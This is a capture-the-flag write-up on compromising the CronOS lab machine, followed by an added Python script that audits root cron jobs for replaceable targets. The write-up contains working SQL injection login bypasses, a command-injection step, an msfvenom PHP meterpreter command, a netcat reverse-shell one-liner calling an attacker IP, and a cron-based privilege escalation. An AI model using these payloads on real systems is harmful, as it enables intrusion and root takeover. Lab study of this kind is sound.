Today's write-up will be for the CronOS Machine. The machine involves Cron Jobs: Googling the word Cron if you aren't familiar with it is, "a Linux utility which schedules a command or script on your server to run automatically at a specified time and date. A cron job is the scheduled task itself. Cron jobs can be very useful to automate repetitive tasks."
OS : Linux
IP : 10.10.10.13
Enumeration:
An nmap scan reveals open ports 22, 53 and 80. We explore the IP:port in the browser and get an Apache2 Ubuntu default page. The HTML source code is a dead end as well.
Before giving up on the default page, we start Burp, intercept the request from the default page and change the Host header value (10.10.10.13) to the host name of the box (cronos.htb). The host name can be obtained in multiple ways in general:
1. A Wireshark traffic capture between your local IP and the remote IP.
2. At the left of your Firefox URL bar, before you input http://..., there is a black circular icon with a white letter i on it; follow More Information, then the General tab, to find it. This works when you input https as well.
3. In some instances the HTML source code might contain it.
4. Run the Sparta enumeration tool, right click on the IP/port 443 and click on sslyze.
We then forward the request with the host name cronos.htb and upon visiting the page we see a new web page, cronos.
We add cronos.htb to our /etc/hosts file, but refreshing the page doesn't yield anything more interesting. Next I enumerate the DNS port using the command host -l cronos.htb 10.10.10.13, plus nslookup and dig for DNS zone transfers, to see if I can find more subdomains. We find more subdomains, which we add to our /etc/hosts file.
Upon visiting all three subdomains in the URL bar, only admin.cronos.htb gives us a login page requiring a username and password. The rest are dead ends. Using manual SQL injection, we are able to log in with the usernames ' OR 1=1# or admin'-- - and a random password: pass. We then get a search box with the ping and traceroute command. We add ;whoami and start Burp to capture the request; upon forwarding it with Repeater, we get command injection as user www-data.
Exploitation:
There are various exploitation methods:
1. Create an msfvenom PHP backdoor (msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=1234 > evil.php), upload it to our server as a text file and rename it to .php (8.8.8.8; wget $localIP/evil.txt -P /var/www/admin/), then use the msf handler to get the shell.
2. Use msfconsole's /multi/script/web_delivery exploit to get a shell.
3. Use Burp. I chose to use Burp.
We use the pentest monkey reverse shell to get a nc reverse shell (rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f), which we can send through Burp. With our nc listener running, we URL-encode the nc shell using Ctrl+U (or right click and choose "URL-encode all key characters") and we get a shell as user www-data. We use python -c "import pty;pty.spawn('/bin/bash');" to get a full shell, and it shows us the cron-os user.
Privilege Escalation:
We run the script LinEnum.sh and see that there is a crontab job for Laravel run by root every minute. We can get code execution by getting Laravel to run a scheduled task, or by replacing the artisan file with a php-reverse-shell script.
We download a php-reverse-shell script to the shell's /tmp folder and set up a nc listener. The backdoor can be found in Kali using the locate command, or from pentest monkey. Change the IP to your local host IP; the port can be left at the default 1234 for the nc listener. We upload the php-reverse-shell file to the same location as the artisan file (/var/www/laravel/artisan) and use the mv command to replace the original artisan file. Since we already have a nc listener started (nc -lvp 1234), we wait: as per the crontab, the artisan task is executed whenever its turn comes up. After a few minutes, the artisan file is executed, and we get a root shell and the flag!!!
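The root cause here is a root cron job whose target file (and its directory) a low-privilege user can modify. The following audit script is an added example, not part of the original write-up, that parses /etc/crontab-style lines and flags root jobs whose script is not owned by the trusted user, is group/other-writable, or sits in a group/other-writable directory (the mv replacement above needs only the latter); the crontab text and files in demo() are constructed, and the paths and function names are mine.

```python
import os
import re
import stat
import tempfile

# Match /etc/crontab-style lines: five schedule fields, a user, then the command.
CRON_LINE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")

def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job line in /etc/crontab text."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # skip blank lines, comments and VAR=value settings
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)

def absolute_paths(command):
    """Return every absolute-path token in a command (interpreter, script, arguments)."""
    return [t for t in re.split(r"[\s;|&>]+", command) if t.startswith("/")]

def writable_by_others(path):
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def weak_cron_targets(crontab_text, trusted_uid=0):
    """Flag root jobs whose script (or its directory) a non-trusted user could alter."""
    findings = []
    for sched, user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for p in absolute_paths(cmd):
            if not os.path.isfile(p):  # ignore missing paths and devices like /dev/null
                continue
            reasons = []
            if os.stat(p).st_uid != trusted_uid:
                reasons.append("file not owned by trusted uid")
            if writable_by_others(p):
                reasons.append("file writable by group/other")
            if writable_by_others(os.path.dirname(p)):
                reasons.append("directory writable by group/other, file can be replaced")
            if reasons:
                findings.append((sched, p, reasons))
    return findings

def demo():
    """Constructed sample: a replaceable artisan job beside a properly locked-down job."""
    base = tempfile.mkdtemp()
    weak_dir, safe_dir = os.path.join(base, "laravel"), os.path.join(base, "bin")
    for d, mode in ((weak_dir, 0o777), (safe_dir, 0o755)):
        os.mkdir(d)
        os.chmod(d, mode)  # explicit chmod so the umask does not mask the test modes
    artisan, backup = os.path.join(weak_dir, "artisan"), os.path.join(safe_dir, "backup.sh")
    for f, mode in ((artisan, 0o666), (backup, 0o755)):
        open(f, "w").close()
        os.chmod(f, mode)
    crontab = (f"# constructed /etc/crontab\nSHELL=/bin/sh\n"
               f"* * * * *\troot\tphp {artisan} schedule:run >> /dev/null 2>&1\n"
               f"0 3 * * *\troot\t{backup}\n")
    found = weak_cron_targets(crontab, trusted_uid=os.getuid())
    return {os.path.basename(p): reasons for _, p, reasons in found}  # {'artisan': [...]}
```

Run it against the real /etc/crontab and /etc/cron.d/* with the default trusted_uid of 0 to catch jobs like the one exploited here before an attacker does.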